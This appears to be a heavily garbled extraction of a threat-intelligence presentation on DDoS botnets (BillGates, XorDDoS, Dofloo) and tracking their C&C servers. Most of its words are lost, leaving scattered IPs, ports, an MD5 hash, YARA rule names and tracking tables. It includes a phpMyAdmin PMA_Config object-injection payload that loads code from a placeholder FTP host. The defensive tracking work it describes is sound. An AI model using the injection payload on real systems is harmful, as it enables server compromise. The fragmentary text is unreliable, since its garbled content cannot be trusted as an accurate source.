

 

 + 3



 -
-3

 -2 -1

2 
1
1 -1

 

-2

 -3











DDoS
 









C&C

 


















/ 




  





()

()

 

()



()



()

CNC)

  



 Step 01

 Step 02

- Step 03







 


   
SQL 

ArcSight FTP
  


:
  
 DDoS 

POS
201641110.2.130.206 winlogon.exeCNC 148.81.111.12


  CNC5 


 Linux/Setag.B.GenMD5 80d0cac0cd6be8010819fdcd7ac4af46
CNC 23.234.50.12:25004
 0x01  0x4B0x55IP0x57

  

A
BillGates 
B
XorDDoS 
C
Dofloo 
...
Botnet ...

    

Decrypted Command Data









...



DNS 

IP 

 





...

Decrypted Command Data








IP

IP









IP DNS 

,









CNC IP CNC

2016-05-19 Billgates DDoS 1.1.1.1 25000

 
Syn

IP 2.2.2.2

 80




2016-0519


Billgates DDoS

 CNC IP CNC  
Gates_1.y 1.1.1.1 25000 Syn ara

 IP
2.2.2. 2

 80







  MD5 CNC IP ...

2016-05-19 Billgates 1 Gates_1.yara 123 MD5 1 1.1.1.1

2015-04-11 Billgates 1 Gates_1.yara 456 MD5 2 1.2.2.2

2014-05-01 Billgates 1 Gates_1.yara 789 MD5 3 1.3.3.3

MD5



MD5  

URL

WEB SERVET 

2015-05-19 MD5 1 70kb http://1.1.1.1:8080

HFS

888

MD5POC

 MD5 POC TYPE

POC

2016-05- MD5 1 Phpmyadmine action=lay_navigation&eoltype=unix&token=1

19

xp

111&configuration=a:1:{i:0;O:10:"PMA_Confi

g":1:{s:6:"source";s:32:ftp://1.1.1.1/syn;}}





,



: n  n  n 

: n  n 


n C&C-IP n VT
  

 
IP++
C&C  .

  

 

 

 


 
  ()  C&C MD5   



  (, Zeus, SpyEye, Citadel, etc.) 
 ,  C&C
MD5
   


END 

